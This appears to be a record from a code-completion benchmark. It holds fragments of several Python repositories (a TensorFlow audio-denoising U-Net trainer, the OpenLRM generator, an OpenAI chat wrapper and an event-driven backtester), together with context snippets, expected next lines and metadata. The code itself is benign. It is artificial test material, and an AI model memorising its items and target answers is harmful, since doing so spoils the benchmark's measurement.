upconv_concat_3D(conv6, conv3, 32 * features, flags, name=7)\n conv7 = res_pool_3D(up7, [32 * features, 32 * features], training, flags, name=7, pool=False)\n\n up8 = upconv_concat_3D(conv7, conv2, 16 * features, flags, name=8)\n conv8 = res_pool_3D(up8, [16 * features, 16 * features], training, flags, name=8, pool=False)\n\n up9 = upconv_concat_3D(conv8, None, 8 * features, flags, name=9)\n conv9 = res_pool_3D(up9, [8 * features, 8 * features], training, flags, name=9, pool=False)\n\n final_name = 'final'\n with tf.variable_scope(final_name): #, reuse = tf.AUTO_REUSE):\n if last_pad:\n final = tf.pad(conv9, [[0, 0], [0, 0], [1, 0], [1, 0], [0, 0]])\n final = ComplexConv3D(\n 1, (1, 1, 1),\n name=final_name,\n activation=None,\n padding='same')(final)\n post_name = 'post_process'\n with tf.variable_scope(post_name): #, reuse = tf.AUTO_REUSE):\n post = tf.squeeze(final, axis=-1)\n post = tf.complex(post[:, 0], post[:, 1])\n if mask:\n phase = post / (tf.complex(tf.abs(post), 0.) + tf.complex(0.000001, 0.))\n mag = tf.tanh(tf.abs(post))\n post = phase * tf.complex(mag, 0.) * pre\n post = tf.contrib.signal.inverse_stft(post, frame_length=flags.stft_freq_samples,\n frame_step=frame_step)\n post = tf.real(post)\n\n return (post, mag, [conv1, conv2, conv3, conv4, conv5, conv6, conv7, conv8, conv9, final])"
}
] | from .config import Flags
from .utils import audio_generator_complex, config_dataset, get_graph_size, get_wav_files
from .loss import weighted_sdr_loss
from .network import make_asppunet_3D
import tensorflow as tf
import datetime
import sklearn
import os
import time
import numpy as np
import scipy
import random | 3,338 |
def make_train_op(X, y_pred, y_true, flags, additional_loss_input):
"""
Create the training operation.
Args:
X: Input tensor.
y_pred: Predicted output tensor.
y_true: True output tensor.
flags: Flags object.
additional_loss_input: Additional loss input tensor.
Returns:
Tuple containing the training operation and the loss tensor.
"""
# Loss Calculation:
loss = weighted_sdr_loss(X, y_pred, y_true)
tf.summary.scalar("weighted_sdr_loss", loss)
# MSE Loss
if additional_loss_input is not None:
frame_step = flags.stft_freq_samples - flags.noverlap - 2
stft_true = tf.contrib.signal.stft(y_true, frame_length=flags.stft_freq_samples, frame_step=frame_step)
mag_true = tf.abs(stft_true)
mag_loss = tf.reduce_mean(tf.abs(mag_true - additional_loss_input))
loss += mag_loss
tf.summary.scalar("mag_loss", mag_loss)
# Global Step and Learning Rate Decay
global_step = tf.train.get_or_create_global_step()
tf.summary.scalar("global_step", global_step)
starter_learning_rate = flags.learning_rate
end_learning_rate = flags.end_learning_rate
learning_rate = tf.train.polynomial_decay(starter_learning_rate, global_step,
flags.fs, end_learning_rate,
power=0.5)
tf.summary.scalar("learning_rate", learning_rate)
# Optimizer and Minimization
optim = tf.train.AdamOptimizer(learning_rate=learning_rate)
return optim.minimize(loss, global_step=global_step), loss
def get_train_data(flags):
"""
Get training and validation data.
Args:
flags: Flags object.
Returns:
Tuple containing iterator, training dataset, validation dataset, training size, and validation size.
"""
all_files = get_wav_files(flags.train_clean_dir)
train_files, valid_files = sklearn.model_selection.train_test_split(all_files, test_size=flags.validation_size, random_state=42)
train = lambda: audio_generator_complex(train_files, flags)
valid = lambda: audio_generator_complex(valid_files, flags)
with tf.name_scope('input'):
input_shape = tuple(np.array([None]))
output_shape = input_shape
train_images_tf = tf.data.Dataset.from_generator(train, (tf.float32, tf.float32), (input_shape, output_shape))
valid_images_tf = tf.data.Dataset.from_generator(valid, (tf.float32, tf.float32), (input_shape, output_shape))
train_images_tf = config_dataset(train_images_tf, flags)
valid_images_tf = config_dataset(valid_images_tf, flags)
iterator = tf.data.Iterator.from_structure(train_images_tf.output_types, train_images_tf.output_shapes)
# Get datasets sizes
train_size = sum(samples_per_file for _, _, samples_per_file in train())
valid_size = sum(samples_per_file for _, _, samples_per_file in valid())
return iterator, train_images_tf, valid_images_tf, train_size, valid_size
def save_loss(epoch_array, validation_accuracy, train_accuracy, path, train_loss_arr):
"""
Save loss information to files.
Args:
epoch_array: Array containing epoch numbers.
validation_accuracy: Validation accuracy values.
train_accuracy: Training accuracy values.
path: Path to save the files.
train_loss_arr: Training loss values.
"""
comb_ = np.asarray([epoch_array, validation_accuracy, train_accuracy])
np.savetxt(os.path.join(path, "loss.csv"), comb_, delimiter=",")
np.savetxt(os.path.join(path, "train_loss.csv"), train_loss_arr, delimiter=",")
def main():
# Initialize Flags object
flags = Flags()
# Clears the default graph stack and resets the global default graph
tf.reset_default_graph()
graph = tf.get_default_graph()
# Get training and validation data
iterator, train_images_tf, valid_images_tf, train_size, valid_size = get_train_data(flags)
n_batches_train = int(train_size // flags.batch_size)
n_batches_valid = int(valid_size // flags.batch_size)
# Define input placeholders and build the UNET model
X, y = iterator.get_next()
mode = tf.placeholder(tf.bool, name="mode")
pred, _, _ = make_asppunet_3D(X, mode, flags, features=flags.net_size, last_pad=True, mask=True)
additional_loss_input = None
print("Defined UNET")
# Build the training operation
with tf.name_scope('optimize'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op, loss = make_train_op(X, pred, y, flags, additional_loss_input)
# Merge all summaries
summary_op = tf.summary.merge_all()
# Define checkpoint directory
|
def make_train_op(X, y_pred, y_true, flags, additional_loss_input):
"""
Create the training operation.
Args:
X: Input tensor.
y_pred: Predicted output tensor.
y_true: True output tensor.
flags: Flags object.
additional_loss_input: Additional loss input tensor.
Returns:
Tuple containing the training operation and the loss tensor.
"""
# Loss Calculation:
loss = weighted_sdr_loss(X, y_pred, y_true)
tf.summary.scalar("weighted_sdr_loss", loss)
# MSE Loss
if additional_loss_input is not None:
frame_step = flags.stft_freq_samples - flags.noverlap - 2
stft_true = tf.contrib.signal.stft(y_true, frame_length=flags.stft_freq_samples, frame_step=frame_step)
mag_true = tf.abs(stft_true)
mag_loss = tf.reduce_mean(tf.abs(mag_true - additional_loss_input))
loss += mag_loss
tf.summary.scalar("mag_loss", mag_loss)
# Global Step and Learning Rate Decay
global_step = tf.train.get_or_create_global_step()
tf.summary.scalar("global_step", global_step)
starter_learning_rate = flags.learning_rate
end_learning_rate = flags.end_learning_rate
learning_rate = tf.train.polynomial_decay(starter_learning_rate, global_step,
flags.fs, end_learning_rate,
power=0.5)
tf.summary.scalar("learning_rate", learning_rate)
# Optimizer and Minimization
optim = tf.train.AdamOptimizer(learning_rate=learning_rate)
return optim.minimize(loss, global_step=global_step), loss
def get_train_data(flags):
"""
Get training and validation data.
Args:
flags: Flags object.
Returns:
Tuple containing iterator, training dataset, validation dataset, training size, and validation size.
"""
all_files = get_wav_files(flags.train_clean_dir)
train_files, valid_files = sklearn.model_selection.train_test_split(all_files, test_size=flags.validation_size, random_state=42)
train = lambda: audio_generator_complex(train_files, flags)
valid = lambda: audio_generator_complex(valid_files, flags)
with tf.name_scope('input'):
input_shape = tuple(np.array([None]))
output_shape = input_shape
train_images_tf = tf.data.Dataset.from_generator(train, (tf.float32, tf.float32), (input_shape, output_shape))
valid_images_tf = tf.data.Dataset.from_generator(valid, (tf.float32, tf.float32), (input_shape, output_shape))
train_images_tf = config_dataset(train_images_tf, flags)
valid_images_tf = config_dataset(valid_images_tf, flags)
iterator = tf.data.Iterator.from_structure(train_images_tf.output_types, train_images_tf.output_shapes)
# Get datasets sizes
train_size = sum(samples_per_file for _, _, samples_per_file in train())
valid_size = sum(samples_per_file for _, _, samples_per_file in valid())
return iterator, train_images_tf, valid_images_tf, train_size, valid_size
def save_loss(epoch_array, validation_accuracy, train_accuracy, path, train_loss_arr):
"""
Save loss information to files.
Args:
epoch_array: Array containing epoch numbers.
validation_accuracy: Validation accuracy values.
train_accuracy: Training accuracy values.
path: Path to save the files.
train_loss_arr: Training loss values.
"""
comb_ = np.asarray([epoch_array, validation_accuracy, train_accuracy])
np.savetxt(os.path.join(path, "loss.csv"), comb_, delimiter=",")
np.savetxt(os.path.join(path, "train_loss.csv"), train_loss_arr, delimiter=",")
def main():
# Initialize Flags object
flags = Flags()
# Clears the default graph stack and resets the global default graph
tf.reset_default_graph()
graph = tf.get_default_graph()
# Get training and validation data
iterator, train_images_tf, valid_images_tf, train_size, valid_size = get_train_data(flags)
n_batches_train = int(train_size // flags.batch_size)
n_batches_valid = int(valid_size // flags.batch_size)
# Define input placeholders and build the UNET model
X, y = iterator.get_next()
mode = tf.placeholder(tf.bool, name="mode")
pred, _, _ = make_asppunet_3D(X, mode, flags, features=flags.net_size, last_pad=True, mask=True)
additional_loss_input = None
print("Defined UNET")
# Build the training operation
with tf.name_scope('optimize'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op, loss = make_train_op(X, pred, y, flags, additional_loss_input)
# Merge all summaries
summary_op = tf.summary.merge_all()
# Define checkpoint directory | checkpoint_dir = os.path.join(flags.ckdir, str(get_graph_size())[:3] + '_' + str(time.time())) | 3 | 2023-12-20 19:58:18+00:00 | 4k |
camenduru/OpenLRM-hf | lrm/models/generator.py | [
{
"identifier": "DinoWrapper",
"path": "lrm/models/encoders/dino_wrapper.py",
"snippet": "class DinoWrapper(nn.Module):\n \"\"\"\n Dino v1 wrapper using huggingface transformer implementation.\n \"\"\"\n def __init__(self, model_name: str, freeze: bool = True):\n super().__init__()\n self.model, self.processor = self._build_dino(model_name)\n if freeze:\n self._freeze()\n\n def forward(self, image):\n # image: [N, C, H, W], on cpu\n # RGB image with [0,1] scale and properly sized\n inputs = self.processor(images=image, return_tensors=\"pt\", do_rescale=False, do_resize=False).to(self.model.device)\n # This resampling of positional embedding uses bicubic interpolation\n outputs = self.model(**inputs, interpolate_pos_encoding=True)\n last_hidden_states = outputs.last_hidden_state\n return last_hidden_states\n\n def _freeze(self):\n print(f\"======== Freezing DinoWrapper ========\")\n self.model.eval()\n for name, param in self.model.named_parameters():\n param.requires_grad = False\n\n @staticmethod\n def _build_dino(model_name: str, proxy_error_retries: int = 3, proxy_error_cooldown: int = 5):\n import requests\n try:\n model = ViTModel.from_pretrained(model_name, add_pooling_layer=False)\n processor = ViTImageProcessor.from_pretrained(model_name)\n return model, processor\n except requests.exceptions.ProxyError as err:\n if proxy_error_retries > 0:\n print(f\"Huggingface ProxyError: Retrying in {proxy_error_cooldown} seconds...\")\n import time\n time.sleep(proxy_error_cooldown)\n return DinoWrapper._build_dino(model_name, proxy_error_retries - 1, proxy_error_cooldown)\n else:\n raise err"
},
{
"identifier": "TriplaneTransformer",
"path": "lrm/models/transformer.py",
"snippet": "class TriplaneTransformer(nn.Module):\n \"\"\"\n Transformer with condition and modulation that generates a triplane representation.\n \n Reference:\n Timm: https://github.com/huggingface/pytorch-image-models/blob/main/timm/models/vision_transformer.py#L486\n \"\"\"\n def __init__(self, inner_dim: int, image_feat_dim: int, camera_embed_dim: int,\n triplane_low_res: int, triplane_high_res: int, triplane_dim: int,\n num_layers: int, num_heads: int,\n eps: float = 1e-6):\n super().__init__()\n\n # attributes\n self.triplane_low_res = triplane_low_res\n self.triplane_high_res = triplane_high_res\n self.triplane_dim = triplane_dim\n\n # modules\n # initialize pos_embed with 1/sqrt(dim) * N(0, 1)\n self.pos_embed = nn.Parameter(torch.randn(1, 3*triplane_low_res**2, inner_dim) * (1. / inner_dim) ** 0.5)\n self.layers = nn.ModuleList([\n ConditionModulationBlock(\n inner_dim=inner_dim, cond_dim=image_feat_dim, mod_dim=camera_embed_dim, num_heads=num_heads, eps=eps)\n for _ in range(num_layers)\n ])\n self.norm = nn.LayerNorm(inner_dim, eps=eps)\n self.deconv = nn.ConvTranspose2d(inner_dim, triplane_dim, kernel_size=2, stride=2, padding=0)\n\n def forward(self, image_feats, camera_embeddings):\n # image_feats: [N, L_cond, D_cond]\n # camera_embeddings: [N, D_mod]\n\n assert image_feats.shape[0] == camera_embeddings.shape[0], \\\n f\"Mismatched batch size: {image_feats.shape[0]} vs {camera_embeddings.shape[0]}\"\n\n N = image_feats.shape[0]\n H = W = self.triplane_low_res\n L = 3 * H * W\n\n x = self.pos_embed.repeat(N, 1, 1) # [N, L, D]\n for layer in self.layers:\n x = layer(x, image_feats, camera_embeddings)\n x = self.norm(x)\n\n # separate each plane and apply deconv\n x = x.view(N, 3, H, W, -1)\n x = torch.einsum('nihwd->indhw', x) # [3, N, D, H, W]\n x = x.contiguous().view(3*N, -1, H, W) # [3*N, D, H, W]\n x = self.deconv(x) # [3*N, D', H', W']\n x = x.view(3, N, *x.shape[-3:]) # [3, N, D', H', W']\n x = torch.einsum('indhw->nidhw', x) # [N, 3, D', H', W']\n x = x.contiguous()\n\n assert self.triplane_high_res == x.shape[-2], \\\n f\"Output triplane resolution does not match with expected: {x.shape[-2]} vs {self.triplane_high_res}\"\n assert self.triplane_dim == x.shape[-3], \\\n f\"Output triplane dimension does not match with expected: {x.shape[-3]} vs {self.triplane_dim}\"\n\n return x"
},
{
"identifier": "TriplaneSynthesizer",
"path": "lrm/models/rendering/synthesizer.py",
"snippet": "class TriplaneSynthesizer(nn.Module):\n \"\"\"\n Synthesizer that renders a triplane volume with planes and a camera.\n \n Reference:\n EG3D: https://github.com/NVlabs/eg3d/blob/main/eg3d/training/triplane.py#L19\n \"\"\"\n\n DEFAULT_RENDERING_KWARGS = {\n 'ray_start': 'auto',\n 'ray_end': 'auto',\n 'box_warp': 2.,\n 'white_back': True,\n 'disparity_space_sampling': False,\n 'clamp_mode': 'softplus',\n 'sampler_bbox_min': -1.,\n 'sampler_bbox_max': 1.,\n }\n\n def __init__(self, triplane_dim: int, samples_per_ray: int):\n super().__init__()\n\n # attributes\n self.triplane_dim = triplane_dim\n self.rendering_kwargs = {\n **self.DEFAULT_RENDERING_KWARGS,\n 'depth_resolution': samples_per_ray // 2,\n 'depth_resolution_importance': samples_per_ray // 2,\n }\n\n # renderings\n self.renderer = ImportanceRenderer()\n self.ray_sampler = RaySampler()\n\n # modules\n self.decoder = OSGDecoder(n_features=triplane_dim)\n\n def forward(self, planes, cameras, render_size: int):\n # planes: (N, 3, D', H', W')\n # cameras: (N, M, D_cam)\n # render_size: int\n assert planes.shape[0] == cameras.shape[0], \"Batch size mismatch for planes and cameras\"\n N, M = cameras.shape[:2]\n \n cam2world_matrix = cameras[..., :16].view(N, M, 4, 4)\n intrinsics = cameras[..., 16:25].view(N, M, 3, 3)\n\n # Create a batch of rays for volume rendering\n ray_origins, ray_directions = self.ray_sampler(\n cam2world_matrix=cam2world_matrix.reshape(-1, 4, 4),\n intrinsics=intrinsics.reshape(-1, 3, 3),\n render_size=render_size,\n )\n assert N*M == ray_origins.shape[0], \"Batch size mismatch for ray_origins\"\n assert ray_origins.dim() == 3, \"ray_origins should be 3-dimensional\"\n\n # Perform volume rendering\n rgb_samples, depth_samples, weights_samples = self.renderer(\n planes.repeat_interleave(M, dim=0), self.decoder, ray_origins, ray_directions, self.rendering_kwargs,\n )\n\n # Reshape into 'raw' neural-rendered image\n Himg = Wimg = render_size\n rgb_images = rgb_samples.permute(0, 2, 1).reshape(N, M, rgb_samples.shape[-1], Himg, Wimg).contiguous()\n depth_images = depth_samples.permute(0, 2, 1).reshape(N, M, 1, Himg, Wimg)\n weight_images = weights_samples.permute(0, 2, 1).reshape(N, M, 1, Himg, Wimg)\n\n return {\n 'images_rgb': rgb_images,\n 'images_depth': depth_images,\n 'images_weight': weight_images,\n }\n\n def forward_grid(self, planes, grid_size: int, aabb: torch.Tensor = None):\n # planes: (N, 3, D', H', W')\n # grid_size: int\n # aabb: (N, 2, 3)\n if aabb is None:\n aabb = torch.tensor([\n [self.rendering_kwargs['sampler_bbox_min']] * 3,\n [self.rendering_kwargs['sampler_bbox_max']] * 3,\n ], device=planes.device, dtype=planes.dtype).unsqueeze(0).repeat(planes.shape[0], 1, 1)\n assert planes.shape[0] == aabb.shape[0], \"Batch size mismatch for planes and aabb\"\n N = planes.shape[0]\n\n # create grid points for triplane query\n grid_points = []\n for i in range(N):\n grid_points.append(torch.stack(torch.meshgrid(\n torch.linspace(aabb[i, 0, 0], aabb[i, 1, 0], grid_size, device=planes.device),\n torch.linspace(aabb[i, 0, 1], aabb[i, 1, 1], grid_size, device=planes.device),\n torch.linspace(aabb[i, 0, 2], aabb[i, 1, 2], grid_size, device=planes.device),\n indexing='ij',\n ), dim=-1).reshape(-1, 3))\n cube_grid = torch.stack(grid_points, dim=0).to(planes.device)\n\n features = self.forward_points(planes, cube_grid)\n\n # reshape into grid\n features = {\n k: v.reshape(N, grid_size, grid_size, grid_size, -1)\n for k, v in features.items()\n }\n return features\n\n def forward_points(self, planes, 
points: torch.Tensor, chunk_size: int = 2**20):\n # planes: (N, 3, D', H', W')\n # points: (N, P, 3)\n N, P = points.shape[:2]\n\n # query triplane in chunks\n outs = []\n for i in range(0, points.shape[1], chunk_size):\n chunk_points = points[:, i:i+chunk_size]\n\n # query triplane\n chunk_out = self.renderer.run_model_activated(\n planes=planes,\n decoder=self.decoder,\n sample_coordinates=chunk_points,\n sample_directions=torch.zeros_like(chunk_points),\n options=self.rendering_kwargs,\n )\n outs.append(chunk_out)\n\n # concatenate the outputs\n point_features = {\n k: torch.cat([out[k] for out in outs], dim=1)\n for k in outs[0].keys()\n }\n return point_features"
}
] | import torch.nn as nn
from .encoders.dino_wrapper import DinoWrapper
from .transformer import TriplaneTransformer
from .rendering.synthesizer import TriplaneSynthesizer | 3,305 | # Copyright (c) 2023, Zexin He
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class CameraEmbedder(nn.Module):
"""
Embed camera features to a high-dimensional vector.
Reference:
DiT: https://github.com/facebookresearch/DiT/blob/main/models.py#L27
"""
def __init__(self, raw_dim: int, embed_dim: int):
super().__init__()
self.mlp = nn.Sequential(
nn.Linear(raw_dim, embed_dim),
nn.SiLU(),
nn.Linear(embed_dim, embed_dim),
)
def forward(self, x):
return self.mlp(x)
class LRMGenerator(nn.Module):
"""
Full model of the large reconstruction model.
"""
def __init__(self, camera_embed_dim: int, rendering_samples_per_ray: int,
transformer_dim: int, transformer_layers: int, transformer_heads: int,
triplane_low_res: int, triplane_high_res: int, triplane_dim: int,
encoder_freeze: bool = True, encoder_model_name: str = 'facebook/dino-vitb16', encoder_feat_dim: int = 768):
super().__init__()
# attributes
self.encoder_feat_dim = encoder_feat_dim
self.camera_embed_dim = camera_embed_dim
# modules
self.encoder = DinoWrapper(
model_name=encoder_model_name,
freeze=encoder_freeze,
)
self.camera_embedder = CameraEmbedder(
raw_dim=12+4, embed_dim=camera_embed_dim,
)
self.transformer = TriplaneTransformer(
inner_dim=transformer_dim, num_layers=transformer_layers, num_heads=transformer_heads,
image_feat_dim=encoder_feat_dim,
camera_embed_dim=camera_embed_dim,
triplane_low_res=triplane_low_res, triplane_high_res=triplane_high_res, triplane_dim=triplane_dim,
)
| # Copyright (c) 2023, Zexin He
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class CameraEmbedder(nn.Module):
"""
Embed camera features to a high-dimensional vector.
Reference:
DiT: https://github.com/facebookresearch/DiT/blob/main/models.py#L27
"""
def __init__(self, raw_dim: int, embed_dim: int):
super().__init__()
self.mlp = nn.Sequential(
nn.Linear(raw_dim, embed_dim),
nn.SiLU(),
nn.Linear(embed_dim, embed_dim),
)
def forward(self, x):
return self.mlp(x)
class LRMGenerator(nn.Module):
"""
Full model of the large reconstruction model.
"""
def __init__(self, camera_embed_dim: int, rendering_samples_per_ray: int,
transformer_dim: int, transformer_layers: int, transformer_heads: int,
triplane_low_res: int, triplane_high_res: int, triplane_dim: int,
encoder_freeze: bool = True, encoder_model_name: str = 'facebook/dino-vitb16', encoder_feat_dim: int = 768):
super().__init__()
# attributes
self.encoder_feat_dim = encoder_feat_dim
self.camera_embed_dim = camera_embed_dim
# modules
self.encoder = DinoWrapper(
model_name=encoder_model_name,
freeze=encoder_freeze,
)
self.camera_embedder = CameraEmbedder(
raw_dim=12+4, embed_dim=camera_embed_dim,
)
self.transformer = TriplaneTransformer(
inner_dim=transformer_dim, num_layers=transformer_layers, num_heads=transformer_heads,
image_feat_dim=encoder_feat_dim,
camera_embed_dim=camera_embed_dim,
triplane_low_res=triplane_low_res, triplane_high_res=triplane_high_res, triplane_dim=triplane_dim,
) | self.synthesizer = TriplaneSynthesizer( | 2 | 2023-12-21 16:30:19+00:00 | 4k |
garinops/chat-E-AI | ai/openai/chat.py | [
{
"identifier": "OpenAITools",
"path": "ai/openai/tools/tools.py",
"snippet": "class OpenAITools:\n\n @staticmethod\n def get_tools() -> list:\n tools = []\n for tool_config in OPENAI_TOOLS_CONFIG:\n if tool_config[\"enable\"]:\n tool_class = tool_config[\"Tool\"]\n tools.append(tool_class.TOOL_MODEL)\n return tools\n\n @staticmethod\n def handle(name_tool_call: str, parameter_variables) -> ResponseBase:\n \"\"\"1、处理路由OpenAI响应的function.name决定。\"\"\"\n \"\"\"2、工具函数参数及变量值也是由OpenAI响应决定,需要具体工具具体相应处理。\"\"\"\n match name_tool_call:\n # 1.宏微观经济数据、行业数据、消费品市场价格数据工具-处理\n case ToolWwwGarinassetCom.get_indicator_overview.__name__:\n region = parameter_variables.get(\"region\")\n name = parameter_variables.get(\"name\")\n toolResponse = ToolWwwGarinassetCom.get_indicator_overview(region=region, name=name)\n return toolResponse\n # 2.天气工具-处理\n case ToolWttrIn.get_weather.__name__:\n location = parameter_variables.get(\"location\")\n toolResponse = ToolWttrIn.get_weather(location=location)\n return toolResponse\n # 3.时间工具-处理\n case ToolTime.get_time.__name__:\n location = parameter_variables.get(\"location\")\n offset_hours = parameter_variables.get(\"offset_hours\")\n toolResponse = ToolTime.get_time(location=location, offset_hours=offset_hours)\n return toolResponse\n # 4.股票信息-处理\n case ToolXueqiuCom.get_stock.__name__:\n name = parameter_variables.get(\"name\")\n symbol = parameter_variables.get(\"symbol\")\n toolResponse = ToolXueqiuCom.get_stock(name=name, symbol=symbol)\n return toolResponse"
},
{
"identifier": "OpenAIUtilsKey",
"path": "ai/openai/utils/key.py",
"snippet": "class OpenAIUtilsKey:\n\n @staticmethod\n def get_key_in_config():\n _list_keys = OPENAI_API_KEYS\n if not _list_keys:\n loggerOpenAI.error(\"The OpenAI Key Configure Item Were Not Found in The Configuration File.\")\n else:\n if len(_list_keys) == 1 and _list_keys[0] == \"\":\n loggerOpenAI.error(\"The OpenAI Key Has Not Been Configured in The Configuration File.\")\n else:\n return random.choice(_list_keys)\n return\n\n @staticmethod\n def get_key_in_env():\n api_keys = os.environ.get('OPENAI_API_KEYS')\n\n if not api_keys:\n return None\n\n _list_keys = api_keys.split(\",\")\n _list_keys = [key.strip() for key in _list_keys if key.strip()]\n\n if not _list_keys:\n return None\n\n return random.choice(_list_keys)"
},
{
"identifier": "LogUtils",
"path": "common/log.py",
"snippet": "class LogUtils:\n\n @staticmethod\n def new_logger(component_name):\n _logger = logging.getLogger(component_name)\n _is_logger_exist = len(_logger.handlers) > 0\n if _is_logger_exist:\n return _logger\n else:\n _logger.setLevel(SYSTEM_LOG_LEVEL)\n _formatter = logging.Formatter('%(asctime)s - %(levelname)s - [{}] - %(message)s'.format(component_name))\n _console_handler = logging.StreamHandler()\n _console_handler.setLevel(SYSTEM_LOG_LEVEL)\n _console_handler.setFormatter(_formatter)\n _logger.addHandler(_console_handler)\n return _logger"
},
{
"identifier": "OPENAI_MODEL_DICTS",
"path": "config/settings.py",
"snippet": "OPENAI_MODEL_DICTS = MODEL_DICTS_OPENAI[\"gpt-3.5-turbo-1106\"]"
},
{
"identifier": "OPENAI_SYSTEM_CONTENT",
"path": "config/settings.py",
"snippet": "OPENAI_SYSTEM_CONTENT = '你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。'"
},
{
"identifier": "OPENAI_API_RATE_LIMITS",
"path": "config/settings.py",
"snippet": "OPENAI_API_RATE_LIMITS = 3"
},
{
"identifier": "OPENAI_BASE_URL",
"path": "config/settings.py",
"snippet": "OPENAI_BASE_URL = \"\""
},
{
"identifier": "ResponseAI",
"path": "models/response.py",
"snippet": "class ResponseAI(ResponseBase):\n aiCost: float\n aiCostCurrency: str"
},
{
"identifier": "UtilsCalculate",
"path": "utils/calculate.py",
"snippet": "class UtilsCalculate:\n\n @staticmethod\n def cal_token_cost(prompt_tokens, completion_tokens, model: dict) -> float:\n token_cost = ((prompt_tokens * model[\"PriceInput\"] + completion_tokens * model[\"PriceOutput\"]) / model[\"UnitPrice\"])\n return token_cost"
}
] | import json
import backoff as backoff
import openai
from collections import deque
from dotenv import load_dotenv
from openai import OpenAI
from ai.openai.tools.tools import OpenAITools
from ai.openai.utils.key import OpenAIUtilsKey
from common.log import LogUtils
from config.settings import OPENAI_MODEL_DICTS, OPENAI_SYSTEM_CONTENT, OPENAI_API_RATE_LIMITS, OPENAI_BASE_URL
from models.response import ResponseAI
from utils.calculate import UtilsCalculate | 1,755 |
# 加载 .env 文件
load_dotenv()
# 日志logger
loggerOpenAI = LogUtils.new_logger("openai-Chat")
loggerBackoff = LogUtils.new_logger("library-backoff")
class AIOpenAIChat:
def __init__(self):
# 创建一个客户端实例
self.client = OpenAI(
api_key=OpenAIUtilsKey.get_key_in_env() if OpenAIUtilsKey.get_key_in_env() else OpenAIUtilsKey.get_key_in_config(),
base_url=OPENAI_BASE_URL if OPENAI_BASE_URL else None
)
self.model = OPENAI_MODEL_DICTS["Name"]
self.msgSys = OPENAI_SYSTEM_CONTENT
self.msgSysChck = True
self.msgUserAssi = deque()
self.messages = []
self.tools = OpenAITools.get_tools()
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
def __setattr__(self, name, value):
"""messageContentUserAssistant更新则更新messages"""
if name == "msgUserAssi":
messages_system = [{
"role": "system",
"content": self.msgSys
}]
self.messages = messages_system + list(value)
# 执行默认赋值操作
super().__setattr__(name, value)
# 调用
def response(self):
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
"""捕获openai.RateLimitError,回退重试。"""
def _backoff_jitter(rate) -> float:
_jitter = (60 / OPENAI_API_RATE_LIMITS) if OPENAI_API_RATE_LIMITS!=0 else 0
return _jitter
@backoff.on_exception(backoff.expo,
openai.RateLimitError,
max_time=60,
jitter=_backoff_jitter,
raise_on_giveup=False,
logger=loggerBackoff)
def inner_function():
try:
response_chat_completion = self.client.chat.completions.create(
model=self.model,
messages=self.messages,
tools=self.tools,
tool_choice="auto"
)
# Cost模块
prompt_tokens = response_chat_completion.usage.prompt_tokens
completion_tokens = response_chat_completion.usage.completion_tokens
|
# 加载 .env 文件
load_dotenv()
# 日志logger
loggerOpenAI = LogUtils.new_logger("openai-Chat")
loggerBackoff = LogUtils.new_logger("library-backoff")
class AIOpenAIChat:
def __init__(self):
# 创建一个客户端实例
self.client = OpenAI(
api_key=OpenAIUtilsKey.get_key_in_env() if OpenAIUtilsKey.get_key_in_env() else OpenAIUtilsKey.get_key_in_config(),
base_url=OPENAI_BASE_URL if OPENAI_BASE_URL else None
)
self.model = OPENAI_MODEL_DICTS["Name"]
self.msgSys = OPENAI_SYSTEM_CONTENT
self.msgSysChck = True
self.msgUserAssi = deque()
self.messages = []
self.tools = OpenAITools.get_tools()
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
def __setattr__(self, name, value):
"""messageContentUserAssistant更新则更新messages"""
if name == "msgUserAssi":
messages_system = [{
"role": "system",
"content": self.msgSys
}]
self.messages = messages_system + list(value)
# 执行默认赋值操作
super().__setattr__(name, value)
# 调用
def response(self):
self.responseAI = ResponseAI(
answer="",
source="OpenAI",
aiCost=0,
aiCostCurrency=OPENAI_MODEL_DICTS['UnitCurrency']
)
"""捕获openai.RateLimitError,回退重试。"""
def _backoff_jitter(rate) -> float:
_jitter = (60 / OPENAI_API_RATE_LIMITS) if OPENAI_API_RATE_LIMITS!=0 else 0
return _jitter
@backoff.on_exception(backoff.expo,
openai.RateLimitError,
max_time=60,
jitter=_backoff_jitter,
raise_on_giveup=False,
logger=loggerBackoff)
def inner_function():
try:
response_chat_completion = self.client.chat.completions.create(
model=self.model,
messages=self.messages,
tools=self.tools,
tool_choice="auto"
)
# Cost模块
prompt_tokens = response_chat_completion.usage.prompt_tokens
completion_tokens = response_chat_completion.usage.completion_tokens | self.responseAI.aiCost = self.responseAI.aiCost + UtilsCalculate.cal_token_cost( | 8 | 2023-12-16 17:02:13+00:00 | 4k |
ruudjuffermans/Event-Driven-Backtester | backtester/loop.py | [
{
"identifier": "MarketEvent",
"path": "backtester/events.py",
"snippet": "class MarketEvent(Event):\n \"\"\"\n Handles the event of receiving a new market update with corresponding bars.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialises the MarketEvent.\n \"\"\"\n self.type = \"MARKET\""
},
{
"identifier": "SignalEvent",
"path": "backtester/events.py",
